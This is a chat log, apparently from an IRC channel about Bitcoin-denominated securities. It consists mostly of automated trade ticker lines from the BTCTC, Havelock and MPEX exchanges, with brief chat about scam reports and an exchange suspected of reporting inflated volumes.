[HIM] 1 @ 0.181 BTC [-] Aug 21 12:18:22 [HAVELOCK] [HIM] 3 @ 0.18 = 0.54 BTC [-] Aug 21 12:18:34 [HAVELOCK] [HIM] 4 @ 0.179 = 0.716 BTC [-] Aug 21 12:18:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001286 BTC [-] Aug 21 12:21:09 [BTCTC] [S.MPOE-PT] 1 @ 0.0008601 BTC [+] Aug 21 12:25:48 [HAVELOCK] [XBOND] 1 @ 0.00112334 BTC [-] Aug 21 12:26:35 [HAVELOCK] [XBOND] 16 @ 0.00109 = 0.0174 BTC [-] Aug 21 12:26:53 [HAVELOCK] [XBOND] 73 @ 0.00108 = 0.0788 BTC [-] Aug 21 12:27:53 [MPEX] [O.USD.C110T] 1 @ 0.04397947 BTC [-] Aug 21 12:32:09 [BTCTC] [ACTIVEMINING] 15 @ 0.005208 = 0.0781 BTC [-] Aug 21 12:35:46 [BTCTC] [DMS.MINING] 5 @ 0.003319 = 0.0166 BTC [-] Aug 21 12:40:04 [HAVELOCK] [AM100] 1 @ 0.0374 BTC [+] Aug 21 12:41:31 [HAVELOCK] [LABCO] 5 @ 0.0023 = 0.0115 BTC [+] Aug 21 12:50:01 [BTCTC] [DMS.SELLING] 15 @ 0.0178 = 0.267 BTC [+] Aug 21 12:50:37 [BTCTC] [DMS.MINING] 2 @ 0.003319 = 0.0066 BTC [-] Aug 21 12:52:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001483 BTC [+] Aug 21 12:53:28 [MPEX] [S.MPOE] 3601 @ 0.00082989 = 2.9884 BTC [+] Aug 21 12:53:30 [MPEX] [S.MPOE] 3849 @ 0.0008322 = 3.2031 BTC [+] Aug 21 13:03:35 [BTCTC] [LABCOIN] 3 @ 0.002429 = 0.0073 BTC [+] Aug 21 13:03:36 [BTCTC] [LABCOIN] 3 @ 0.002431 = 0.0073 BTC [+] Aug 21 13:03:38 [BTCTC] [LABCOIN] 30 @ 0.002432 = 0.073 BTC [+] Aug 21 13:03:39 [BTCTC] [LABCOIN] 51 @ 0.002433 = 0.1241 BTC [+] Aug 21 13:03:40 [BTCTC] [LABCOIN] 160 @ 0.002434 = 0.3894 BTC [+] Aug 21 13:03:41 [BTCTC] [LABCOIN] 165 @ 0.002435 = 0.4018 BTC [+] Aug 21 13:07:45 [BTCTC] [DMS.SELLING] 19 @ 0.0178 = 0.3382 BTC [+] Aug 21 13:07:46 [BTCTC] [DMS.SELLING] 83 @ 0.0178 = 1.4774 BTC [+] Aug 21 13:09:29 [BTCTC] [BTC-GROWTH] 10 @ 0.09999 = 0.9999 BTC [-] Aug 21 13:09:54 [BTCTC] [BTC-GROWTH] 3 @ 0.09999 = 0.3 BTC [-] Aug 21 13:11:50 [BTCTC] [DMS.SELLING] 98 @ 0.0178 = 1.7444 BTC [+] Aug 21 13:12:31 [BTCTC] [DMS.MINING] 4 @ 0.00325 = 0.013 BTC [-] Aug 21 13:12:33 [BTCTC] [DMS.MINING] 96 @ 0.003239 = 0.3109 BTC [-] Aug 21 13:15:21 [BTCTC] [BASIC-MINING] 1 @ 0.2764 BTC [-] Aug 21 13:15:23 [BTCTC] [BASIC-MINING] 2 @ 0.2761 = 0.5522 BTC [-] Aug 21 13:15:24 [BTCTC] [BASIC-MINING] 10 @ 0.276 = 2.76 BTC [-] Aug 21 13:15:25 [BTCTC] [BASIC-MINING] 4 @ 0.275 = 1.1 BTC [-] Aug 21 13:15:26 [BTCTC] [BASIC-MINING] 4 @ 0.2733 = 1.0932 BTC [-] Aug 21 13:15:27 [BTCTC] [BASIC-MINING] 11 @ 0.2732 = 3.0052 BTC [-] Aug 21 13:16:58 [BTCTC] [BASIC-MINING] 1 @ 0.2733 BTC [+] Aug 21 13:16:59 [BTCTC] [BASIC-MINING] 9 @ 0.2732 = 2.4588 BTC [-] Aug 21 13:17:00 [BTCTC] [BASIC-MINING] 2 @ 0.2721 = 0.5442 BTC [-] Aug 21 13:17:01 [BTCTC] [BASIC-MINING] 11 @ 0.272 = 2.992 BTC [-] Aug 21 13:17:02 [BTCTC] [BASIC-MINING] 1 @ 0.2701 BTC [-] Aug 21 13:17:04 [BTCTC] [BASIC-MINING] 65 @ 0.27 = 17.55 BTC [-] Aug 21 13:17:05 [BTCTC] [BASIC-MINING] 16 @ 0.2681 = 4.2896 BTC [-] Aug 21 13:17:06 [BTCTC] [BASIC-MINING] 1 @ 0.268 BTC [-] Aug 21 13:17:07 [BTCTC] [BASIC-MINING] 5 @ 0.2633 = 1.3165 BTC [-] Aug 21 13:17:08 [BTCTC] [BASIC-MINING] 20 @ 0.256 = 5.12 BTC [-] Aug 21 13:17:09 [BTCTC] [BASIC-MINING] 12 @ 0.255 = 3.06 BTC [-] Aug 21 13:17:10 [BTCTC] [BASIC-MINING] 1 @ 0.253 BTC [-] Aug 21 13:17:10 [BTCTC] [BASIC-MINING] 4 @ 0.25 = 1 BTC [-] Aug 21 13:17:12 [BTCTC] [BASIC-MINING] 1 @ 0.25 BTC [-] Aug 21 13:17:13 [BTCTC] [BASIC-MINING] 22 @ 0.25 = 5.5 BTC [-] Aug 21 13:19:13 .d Aug 21 13:19:14 50810339.04828 | Next Diff in 635 blocks | Estimated Change: 25.1159% in 3d 7h 2m 42s Aug 21 13:22:35 [BTCTC] [LABCOIN] 30 @ 0.002399 = 0.072 BTC [-] Aug 21 13:22:37 [BTCTC] [LABCOIN] 1000 @ 0.002398 = 2.398 BTC [-] Aug 21 13:30:36 [HAVELOCK] [XBOND] 38 @ 0.001185 = 0.045 BTC [+] Aug 21 13:30:44 [BTCTC] [DMS.SELLING] 100 @ 0.0178 = 1.78 BTC [+] Aug 21 13:31:48 [BTCTC] [LABCOIN] 15 @ 0.002399 = 0.036 BTC [+] Aug 21 13:32:13 [BTCTC] [LABCOIN] 6 @ 0.002399 = 0.0144 BTC [+] Aug 21 13:32:14 [BTCTC] [LABCOIN] 20 @ 0.002398 = 0.048 BTC [-] Aug 21 13:36:08 [BTCTC] [DMS.MINING] 100 @ 0.003239 = 0.3239 BTC [-] Aug 21 13:36:31 [BTCTC] [DMS.PURCHASE] 150 @ 0.02061 = 3.0915 BTC [+] Aug 21 13:41:18 [BTCTC] [LABCOIN] 2 @ 0.002396 = 0.0048 BTC [-] Aug 21 13:41:50 [BTCTC] [DMS.SELLING] 107 @ 0.0178 = 1.9046 BTC [+] Aug 21 13:42:58 [BTCTC] [LABCOIN] 15 @ 0.002396 = 0.0359 BTC [-] Aug 21 13:43:07 https://bitcointalk.org/index.php?topic=278895.0 Aug 21 13:43:18 SCAMMER TAG REQUEST - CASINOBIT.NET IS NOT PAYING OUT INVESTORS Aug 21 13:44:04 [BTCTC] [LABCOIN] 6 @ 0.002396 = 0.0144 BTC [-] Aug 21 13:45:32 [HAVELOCK] [SDSTM] 2 @ 0.00569 = 0.0114 BTC [+] Aug 21 13:45:37 [BTCTC] [ASICMINER-PT] 1 @ 3.629 BTC [+] Aug 21 13:45:50 [BTCTC] [DMS.SELLING] 95 @ 0.0178 = 1.691 BTC [+] Aug 21 13:45:51 [BTCTC] [DMS.SELLING] 150 @ 0.0178 = 2.67 BTC [+] Aug 21 13:45:52 [BTCTC] [DMS.PURCHASE] 14 @ 0.02061 = 0.2885 BTC [+] Aug 21 13:45:53 [BTCTC] [DMS.SELLING] 145 @ 0.01781 = 2.5825 BTC [+] Aug 21 13:47:39 [BTCTC] [DMS.MINING] 254 @ 0.003239 = 0.8227 BTC [-] Aug 21 13:47:40 [BTCTC] [DMS.MINING] 1 @ 0.003239 BTC [-] Aug 21 13:47:42 [BTCTC] [DMS.MINING] 6 @ 0.003235 = 0.0194 BTC [-] Aug 21 13:47:43 [BTCTC] [DMS.MINING] 5 @ 0.003235 = 0.0162 BTC [-] Aug 21 13:47:44 [BTCTC] [DMS.MINING] 84 @ 0.00322 = 0.2705 BTC [-] Aug 21 13:48:24 [HAVELOCK] [AM100] 1 @ 0.0373 BTC [-] Aug 21 13:48:46 [HAVELOCK] [AM100] 1 @ 0.0373 BTC [-] Aug 21 13:49:26 [BTCTC] [DMS.SELLING] 100 @ 0.01773 = 1.773 BTC [-] Aug 21 13:49:28 [BTCTC] [DMS.SELLING] 1 @ 0.0178 BTC [+] Aug 21 13:49:52 [HAVELOCK] [XBOND] 12 @ 0.001185 = 0.0142 BTC [+] Aug 21 13:50:00 [BTCTC] [DMS.MINING] 100 @ 0.00322 = 0.322 BTC [-] Aug 21 13:50:01 [BTCTC] [DMS.SELLING] 100 @ 0.0178 = 1.78 BTC [+] Aug 21 13:50:27 [BTCTC] [DMS.PURCHASE] 500 @ 0.02061 = 10.305 BTC [+] Aug 21 13:51:30 [BTCTC] [DMS.MINING] 100 @ 0.00322 = 0.322 BTC [-] Aug 21 13:51:48 [HAVELOCK] [SDSTM] 1 @ 0.00569 BTC [+] Aug 21 13:51:49 "To add to the above, I was once charged with raping a 14 year old girl in Nashville." Aug 21 13:51:52 [BTCTC] [DMS.PURCHASE] 100 @ 0.02061 = 2.061 BTC [+] Aug 21 13:52:08 phinn has a history! Aug 21 13:53:35 https://bitcointalk.org/index.php?topic=259100.0 Aug 21 13:53:39 Cryptostocks.com--SENIGMA--20%APR Paying monthly-- Aug 21 13:53:39 somebody ipos smegma Aug 21 13:55:33 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.001483 = 0.0074 BTC [+] Aug 21 13:55:49 hehe Aug 21 13:56:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001484 BTC [+] Aug 21 13:57:26 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001491 = 0.1491 BTC [+] Aug 21 13:58:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001491 BTC [+] Aug 21 13:58:25 lol Aug 21 13:59:03 mircea_popescu: are you following 796.com ? they recently added stock exchange and btc futures Aug 21 13:59:22 seems serious Aug 21 13:59:41 why does it seem serious ? Aug 21 13:59:41 [BTCTC] [DMS.MINING] 100 @ 0.003319 = 0.3319 BTC [+] Aug 21 13:59:51 o nm, for a moment there... Aug 21 14:00:08 they report 700k volume for something in july Aug 21 14:00:09 im waiting for them to add hotel reservations. Aug 21 14:00:17 have to dig deeper what exactly that is Aug 21 14:00:46 yeah, this summer's washion was "reporting imaginary volumes" Aug 21 14:00:54 o oops i mean fashion not washion. Aug 21 14:01:50 [BTCTC] [LABCOIN] 20 @ 0.002397 = 0.0479 BTC [+] Aug 21 14:01:51 [BTCTC] [LABCOIN] 2302 @ 0.002396 = 5.5156 BTC [-] Aug 21 14:06:33 [BTCTC] [TAT.MINIGAME] 90 @ 0.000235 = 0.0212 BTC [-] Aug 21 14:07:49 [BTCTC] [ASICMINER-PT] 1 @ 3.52 BTC [-] Aug 21 14:07:50 [BTCTC] [ASICMINER-PT] 1 @ 3.518 BTC [-] Aug 21 14:07:52 [BTCTC] [ASICMINER-PT] 1 @ 3.51 BTC [-] Aug 21 14:07:53 [BTCTC] [ASICMINER-PT] 3 @ 3.501 = 10.503 BTC [-] Aug 21 14:09:17 https://bitcointalk.org/index.php?topic=262198.0 some evidence Aug 21 14:09:20 Insane Bitcoin Futures volume at 796.com Aug 21 14:09:37 [BTCTC] [DMS.SELLING] 100 @ 0.0177 = 1.77 BTC [-] Aug 21 14:10:04 [BTCTC] [DMS.MINING] 100 @ 0.00322 = 0.322 BTC [-] Aug 21 14:10:28 [BTCTC] [DMS.PURCHASE] 150 @ 0.02061 = 3.0915 BTC [+] Aug 21 14:10:48 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.001489 = 0.0298 BTC [-] Aug 21 14:11:13 [BTCTC] [DMS.PURCHASE] 200 @ 0.02061 = 4.122 BTC [+] Aug 21 14:24:22 [BTCTC] [DMS.PURCHASE] 167 @ 0.02061 = 3.4419 BTC [+] Aug 21 14:33:36 [HAVELOCK] [XBOND] 4 @ 0.001185 = 0.0047 BTC [+] Aug 21 14:35:33 [BTCTC] [DMS.MINING] 5 @ 0.0033 = 0.0165 BTC [+] Aug 21 14:37:03 [BTCTC] [DMS.SELLING] 100 @ 0.01752 = 1.752 BTC [-] Aug 21 14:37:33 [BTCTC] [DMS.MINING] 50 @ 0.00322 = 0.161 BTC [-] Aug 21 14:37:49 [BTCTC] [DMS.MINING] 7 @ 0.00322 = 0.0225 BTC [-] Aug 21 14:38:11 [BTCTC] [DMS.PURCHASE] 50 @ 0.02061 = 1.0305 BTC [+] Aug 21 14:49:37 [BTCTC] [ACTIVEMINING] 1 @ 0.005292 BTC [+] Aug 21 14:49:58 [BTCTC] [LABCOIN] 1 @ 0.002414 BTC [+] Aug 21 14:53:03 [BTCTC] [DMS.MINING] 50 @ 0.0033 = 0.165 BTC [+] Aug 21 14:53:58 [BTCTC] [DMS.MINING] 70 @ 0.0033 = 0.231 BTC [+] Aug 21 14:54:07 [BTCTC] [LABCOIN] 20 @ 0.002391 = 0.0478 BTC [-] Aug 21 14:54:08 [BTCTC] [LABCOIN] 10 @ 0.00239 = 0.0239 BTC [-] Aug 21 14:54:10 [BTCTC] [LABCOIN] 11 @ 0.002378 = 0.0262 BTC [-] Aug 21 14:54:11 [BTCTC] [LABCOIN] 4 @ 0.002361 = 0.0094 BTC [-] Aug 21 14:54:12 [BTCTC] [LABCOIN] 426 @ 0.002312 = 0.9849 BTC [-] Aug 21 14:54:13 [BTCTC] [LABCOIN] 75 @ 0.002312 = 0.1734 BTC [-] Aug 21 14:54:13 [BTCTC] [LABCOIN] 1190 @ 0.002311 = 2.7501 BTC [-] Aug 21 14:55:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0359 BTC [-] Aug 21 14:55:57 [BTCTC] [TAT.ASICMINER] 50 @ 0.0359 = 1.795 BTC [-] Aug 21 14:56:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0358 BTC [-] Aug 21 14:56:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.03571 BTC [-] Aug 21 14:57:17 [BTCTC] [TAT.ASICMINER] 3 @ 0.03572 = 0.1072 BTC [+] Aug 21 14:58:10 [BTCTC] [DMS.MINING] 180 @ 0.0033 = 0.594 BTC [+] Aug 21 14:58:12 [BTCTC] [LABCOIN] 6 @ 0.002396 = 0.0144 BTC [+] Aug 21 14:58:14 [BTCTC] [LABCOIN] 19 @ 0.002398 = 0.0456 BTC [+] Aug 21 14:59:50 [HAVELOCK] [SMG] 5 @ 0.000239 = 0.0012 BTC [+] Aug 21 15:00:02 [HAVELOCK] [XBOND] [PAID] 1.00978800 BTC to 2`019`576 shares, 50 satoshi per share Aug 21 15:01:24 [BTCTC] [LABCOIN] 30 @ 0.002383 = 0.0715 BTC [-] Aug 21 15:01:25 [BTCTC] [LABCOIN] 1 @ 0.002384 BTC [+] Aug 21 15:01:26 [BTCTC] [LABCOIN] 3 @ 0.002388 = 0.0072 BTC [+] Aug 21 15:07:16 $avg Aug 21 15:07:17 mircea_popescu: 113.99 Aug 21 15:08:02 [BTCTC] [DMS.MINING] 50 @ 0.00331 = 0.1655 BTC [+] Aug 21 15:08:31 [HAVELOCK] [AM100] 1 @ 0.03739998 BTC [+] Aug 21 15:09:30 [BTCTC] [DMS.MINING] 25 @ 0.00331 = 0.0828 BTC [+] Aug 21 15:10:50 [BTCTC] [DMS.MINING] 75 @ 0.00331 = 0.2483 BTC [+] Aug 21 15:16:32 [BTCTC] [DMS.MINING] 25 @ 0.003319 = 0.083 BTC [+] Aug 21 15:18:13 [BTCTC] [ASICMINER-PT] 1 @ 3.504 BTC [+] Aug 21 15:18:46 [BTCTC] [ASICMINER-PT] 1 @ 3.503 BTC [-] Aug 21 15:19:02 [BTCTC] [DMS.MINING] 50 @ 0.003319 = 0.166 BTC [+] Aug 21 15:20:42 [BTCTC] [LABCOIN] 30 @ 0.002346 = 0.0704 BTC [-] Aug 21 15:20:43 [BTCTC] [LABCOIN] 3 @ 0.002347 = 0.007 BTC [+] Aug 21 15:20:44 [BTCTC] [LABCOIN] 2 @ 0.00235 = 0.0047 BTC [+] Aug 21 15:21:07 [BTCTC] [LABCOIN] 5 @ 0.00235 = 0.0118 BTC [+] Aug 21 15:22:39 [BTCTC] [LABCOIN] 30 @ 0.002342 = 0.0703 BTC [-] Aug 21 15:22:41 [BTCTC] [LABCOIN] 5 @ 0.002343 = 0.0117 BTC [+] Aug 21 15:22:42 [BTCTC] [LABCOIN] 15 @ 0.002345 = 0.0352 BTC [+] Aug 21 15:22:51 [BTCTC] [ASICMINER-PT] 1 @ 3.572 BTC [+] Aug 21 15:22:52 [BTCTC] [ASICMINER-PT] 1 @ 3.573 BTC [+] Aug 21 15:22:54 [BTCTC] [ASICMINER-PT] 1 @ 3.59 BTC [+] Aug 21 15:22:55 [BTCTC] [ASICMINER-PT] 1 @ 3.594 BTC [+] Aug 21 15:22:56 [BTCTC] [ASICMINER-PT] 2 @ 3.595 = 7.19 BTC [+] Aug 21 15:22:57 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [+] Aug 21 15:22:58 [BTCTC] [ASICMINER-PT] 2 @ 3.609 = 7.218 BTC [+] Aug 21 15:22:58 [BTCTC] [ASICMINER-PT] 1 @ 3.61 BTC [+] Aug 21 15:23:46 [BTCTC] [LABCOIN] 30 @ 0.002354 = 0.0706 BTC [+] Aug 21 15:23:47 [BTCTC] [LABCOIN] 15 @ 0.002355 = 0.0353 BTC [+] Aug 21 15:25:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.03617 = 0.1085 BTC [+] Aug 21 15:25:02 [BTCTC] [TAT.ASICMINER] 50 @ 0.03618 = 1.809 BTC [+] Aug 21 15:25:13 [BTCTC] [DMS.MINING] 18 @ 0.003319 = 0.0597 BTC [+] Aug 21 15:32:12 [BTCTC] [DMS.MINING] 50 @ 0.00332 = 0.166 BTC [+] Aug 21 15:33:14 [BTCTC] [DMS.MINING] 7 @ 0.00332 = 0.0232 BTC [+] Aug 21 15:33:47 [BTCTC] [DMS.MINING] 30 @ 0.003325 = 0.0998 BTC [+] Aug 21 15:34:40 [BTCTC] [S.BBET-PT] 4 @ 0.00111 = 0.0044 BTC [-] Aug 21 15:37:41 [BTCTC] [TAT.MINIGAME] 2 @ 0.000235 = 0.0005 BTC [-] Aug 21 15:37:52 [BTCTC] [DMS.MINING] 270 @ 0.003325 = 0.8978 BTC [+] Aug 21 15:38:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.0362 BTC [+] Aug 21 15:38:09 [BTCTC] [TAT.ASICMINER] 9 @ 0.03621 = 0.3259 BTC [+] Aug 21 15:40:45 [HAVELOCK] [CFIG] 4 @ 0.15 = 0.6 BTC Aug 21 15:42:58 [BTCTC] [DMS.SELLING] 304 @ 0.0178 = 5.4112 BTC [+] Aug 21 15:45:51 [BTCTC] [ACTIVEMINING] 10 @ 0.005273 = 0.0527 BTC [-] Aug 21 15:46:34 [BTCTC] [PAJKA.BOND] 2 @ 0.025 = 0.05 BTC [+] Aug 21 15:51:46 [BTCTC] [DMS.MINING] 20 @ 0.00333 = 0.0666 BTC [+] Aug 21 15:52:40 [BTCTC] [ASICMINER-PT] 1 @ 3.513 BTC [-] Aug 21 15:52:41 [BTCTC] [ASICMINER-PT] 1 @ 3.51 BTC [-] Aug 21 15:52:43 [BTCTC] [ASICMINER-PT] 1 @ 3.503 BTC [-] Aug 21 15:52:44 [BTCTC] [ASICMINER-PT] 1 @ 3.502 BTC [-] Aug 21 15:52:45 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [-] Aug 21 15:52:46 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [-] Aug 21 15:52:48 [BTCTC] [ASICMINER-PT] 1 @ 3.5 BTC [-] Aug 21 15:52:49 [BTCTC] [ASICMINER-PT] 1 @ 3.534 BTC [+] Aug 21 15:54:01 [BTCTC] [DMS.MINING] 4 @ 0.00333 = 0.0133 BTC [+] Aug 21 15:54:53 [BTCTC] [ASICMINER-PT] 1 @ 3.477 BTC [-] Aug 21 15:55:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00149 BTC [+] Aug 21 15:58:14 [HAVELOCK] [AM100] 7 @ 0.0373996 = 0.2618 BTC [-] Aug 21 15:58:20 [BTCTC] [ASICMINER-PT] 1 @ 3.477 BTC [-] Aug 21 15:58:22 [BTCTC] [ASICMINER-PT] 1 @ 3.477 BTC [-] Aug 21 15:58:23 [BTCTC] [ASICMINER-PT] 1 @ 3.476 BTC [-] Aug 21 15:58:24 [BTCTC] [ASICMINER-PT] 1 @ 3.474 BTC [-] Aug 21 15:58:25 [BTCTC] [ASICMINER-PT] 1 @ 3.47 BTC [-] Aug 21 15:58:26 [BTCTC] [ASICMINER-PT] 5 @ 3.47 = 17.35 BTC [-] Aug 21 15:58:28 [BTCTC] [ASICMINER-PT] 1 @ 3.465 BTC [-] Aug 21 15:58:29 [BTCTC] [ASICMINER-PT] 1 @ 3.463 BTC [-] Aug 21 15:58:29 [BTCTC] [ASICMINER-PT] 1 @ 3.463 BTC [-] Aug 21 15:58:30 [BTCTC] [ASICMINER-PT] 1 @ 3.461 BTC [-] Aug 21 15:58:31 [BTCTC] [ASICMINER-PT] 1 @ 3.461 BTC [-] Aug 21 15:58:32 [BTCTC] [ASICMINER-PT] 2 @ 3.46 = 6.92 BTC [-] Aug 21 15:58:33 [BTCTC] [ASICMINER-PT] 1 @ 3.455 BTC [-] Aug 21 15:58:35 [BTCTC] [ASICMINER-PT] 4 @ 3.455 = 13.82 BTC [-] Aug 21 15:58:36 [BTCTC] [ASICMINER-PT] 5 @ 3.452 = 17.26 BTC [-] Aug 21 15:58:37 [BTCTC] [ASICMINER-PT] 2 @ 3.452 = 6.904 BTC [-] Aug 21 15:58:38 [BTCTC] [ASICMINER-PT] 7 @ 3.452 = 24.164 BTC [-] Aug 21 15:58:39 [BTCTC] [ASICMINER-PT] 2 @ 3.451 = 6.902 BTC [-] Aug 21 15:59:11 [HAVELOCK] [AM100] 4 @ 0.03739998 = 0.1496 BTC [+] Aug 21 15:59:15 [BTCTC] [ASICMINER-PT] 1 @ 3.432 BTC [-] Aug 21 15:59:17 [BTCTC] [ASICMINER-PT] 2 @ 3.431 = 6.862 BTC [-] Aug 21 15:59:18 [BTCTC] [ASICMINER-PT] 2 @ 3.43 = 6.86 BTC [-] Aug 21 15:59:19 [BTCTC] [ASICMINER-PT] 2 @ 3.42 = 6.84 BTC [-] Aug 21 15:59:20 [BTCTC] [ASICMINER-PT] 1 @ 3.416 BTC [-] Aug 21 15:59:21 [BTCTC] [ASICMINER-PT] 2 @ 3.412 = 6.824 BTC [-] Aug 21 15:59:23 [BTCTC] [ASICMINER-PT] 3 @ 3.41 = 10.23 BTC [-] Aug 21 15:59:24 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [-] Aug 21 15:59:25 [BTCTC] [ASICMINER-PT] 1 @ 3.408 BTC [-] Aug 21 15:59:26 [BTCTC] [ASICMINER-PT] 2 @ 3.403 = 6.806 BTC [-] Aug 21 15:59:30 [HAVELOCK] [AM100] 1 @ 0.03742 BTC [+] Aug 21 15:59:48 [HAVELOCK] [AM100] 10 @ 0.03749 = 0.3749 BTC [+] Aug 21 16:00:54 [BTCTC] [ASICMINER-PT] 1 @ 3.403 BTC [-] Aug 21 16:00:56 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [-] Aug 21 16:00:57 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [-] Aug 21 16:00:58 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Aug 21 16:00:59 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Aug 21 16:01:09 [HAVELOCK] [AM100] 10 @ 0.0375 = 0.375 BTC [+] Aug 21 16:01:25 [BTCTC] [ASICMINER-PT] 4 @ 3.5 = 14 BTC [+] Aug 21 16:02:23 [HAVELOCK] [AM100] 38 @ 0.0375 = 1.425 BTC [+] Aug 21 16:02:54 [BTCTC] [ASICMINER-PT] 3 @ 3.353 = 10.059 BTC [-] Aug 21 16:02:55 [BTCTC] [TAT.ASICMINER] 9 @ 0.03621 = 0.3259 BTC [+] Aug 21 16:03:18 [BTCTC] [DMS.PURCHASE] 5 @ 0.02061 = 0.1031 BTC [+] Aug 21 16:03:23 [HAVELOCK] [XBOND] 106 @ 0.001184 = 0.1255 BTC [-] Aug 21 16:03:28 [BTCTC] [ACTIVEMINING] 30 @ 0.005276 = 0.1583 BTC [+] Aug 21 16:03:40 [BTCTC] [ACTIVEMINING] 2 @ 0.005277 = 0.0106 BTC [+] Aug 21 16:04:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.036 BTC [-] Aug 21 16:04:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.03581 BTC [-] Aug 21 16:04:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.0357 BTC [-] Aug 21 16:04:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0356 BTC [-] Aug 21 16:04:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.0355 = 0.1065 BTC [-] Aug 21 16:04:07 [BTCTC] [TAT.ASICMINER] 3 @ 0.03531 = 0.1059 BTC [-] Aug 21 16:04:08 [BTCTC] [TAT.ASICMINER] 15 @ 0.0353 = 0.5295 BTC [-] Aug 21 16:04:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Aug 21 16:04:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Aug 21 16:04:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.0349 BTC [-] Aug 21 16:04:12 [BTCTC] [TAT.ASICMINER] 16 @ 0.03485 = 0.5576 BTC [-] Aug 21 16:04:13 [BTCTC] [TAT.ASICMINER] 56 @ 0.03484 = 1.951 BTC [-] Aug 21 16:04:48 [BTCTC] [ACTIVEMINING] 68 @ 0.005297 = 0.3602 BTC [+] Aug 21 16:06:10 [BTCTC] [DMS.MINING] 18 @ 0.00332 = 0.0598 BTC [-] Aug 21 16:06:12 [BTCTC] [DMS.MINING] 32 @ 0.003319 = 0.1062 BTC [-] Aug 21 16:06:13 [BTCTC] [TAT.ASICMINER] 21 @ 0.03487 = 0.7323 BTC [+] Aug 21 16:06:13 [BTCTC] [DMS.MINING] 59 @ 0.00322 = 0.19 BTC [-] Aug 21 16:06:14 [BTCTC] [TAT.ASICMINER] 33 @ 0.03486 = 1.1504 BTC [-] Aug 21 16:06:15 [BTCTC] [DMS.MINING] 2 @ 0.003215 = 0.0064 BTC [-] Aug 21 16:06:16 [BTCTC] [TAT.ASICMINER] 46 @ 0.03485 = 1.6031 BTC [-] Aug 21 16:06:17 [BTCTC] [DMS.MINING] 39 @ 0.003212 = 0.1253 BTC [-] Aug 21 16:06:38 [BTCTC] [DMS.PURCHASE] 150 @ 0.02061 = 3.0915 BTC [+] Aug 21 16:06:40 [HAVELOCK] [CFIG] 7 @ 0.15 = 1.05 BTC Aug 21 16:07:15 [BTCTC] [ASICMINER-PT] 1 @ 3.352 BTC [-] Aug 21 16:07:17 [BTCTC] [ASICMINER-PT] 1 @ 3.35 BTC [-] Aug 21 16:07:18 [BTCTC] [ASICMINER-PT] 1 @ 3.332 BTC [-] Aug 21 16:07:18 [BTCTC] [ASICMINER-PT] 1 @ 3.331 BTC [-] Aug 21 16:07:20 [BTCTC] [ASICMINER-PT] 1 @ 3.33 BTC [-] Aug 21 16:07:21 [BTCTC] [ASICMINER-PT] 1 @ 3.33 BTC [-] Aug 21 16:07:22 [BTCTC] [ASICMINER-PT] 4 @ 3.32 = 13.28 BTC [-] Aug 21 16:07:24 [BTCTC] [ASICMINER-PT] 1 @ 3.312 BTC [-] Aug 21 16:07:25 [BTCTC] [ASICMINER-PT] 3 @ 3.311 = 9.933 BTC [-] Aug 21 16:07:26 [BTCTC] [ASICMINER-PT] 10 @ 3.31 = 33.1 BTC [-] Aug 21 16:07:27 [BTCTC] [ASICMINER-PT] 2 @ 3.302 = 6.604 BTC [-] Aug 21 16:07:28 [BTCTC] [ASICMINER-PT] 5 @ 3.301 = 16.505 BTC [-] Aug 21 16:07:29 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Aug 21 16:07:30 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Aug 21 16:07:31 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Aug 21 16:07:36 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Aug 21 16:07:37 [BTCTC] [ASICMINER-PT] 4 @ 3.3 = 13.2 BTC [-] Aug 21 16:07:39 [BTCTC] [ASICMINER-PT] 21 @ 3.3 = 69.3 BTC [-] Aug 21 16:08:52 [BTCTC] [LABCOIN] 15 @ 0.002351 = 0.0353 BTC [-] Aug 21 16:08:53 [BTCTC] [LABCOIN] 1 @ 0.002352 BTC [+] Aug 21 16:08:55 [BTCTC] [LABCOIN] 20 @ 0.002356 = 0.0471 BTC [+] Aug 21 16:08:56 [BTCTC] [LABCOIN] 2 @ 0.002373 = 0.0047 BTC [+] Aug 21 16:08:57 [BTCTC] [LABCOIN] 21 @ 0.002374 = 0.0499 BTC [+] Aug 21 16:08:58 [BTCTC] [LABCOIN] 9 @ 0.002425 = 0.0218 BTC [+] Aug 21 16:08:58 [BTCTC] [LABCOIN] 75 @ 0.002426 = 0.182 BTC [+] Aug 21 16:09:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.03486 = 0.0697 BTC [+] Aug 21 16:09:47 [BTCTC] [TAT.ASICMINER] 24 @ 0.03484 = 0.8362 BTC [-] Aug 21 16:09:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.03481 = 0.0696 BTC [-] Aug 21 16:09:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.0348 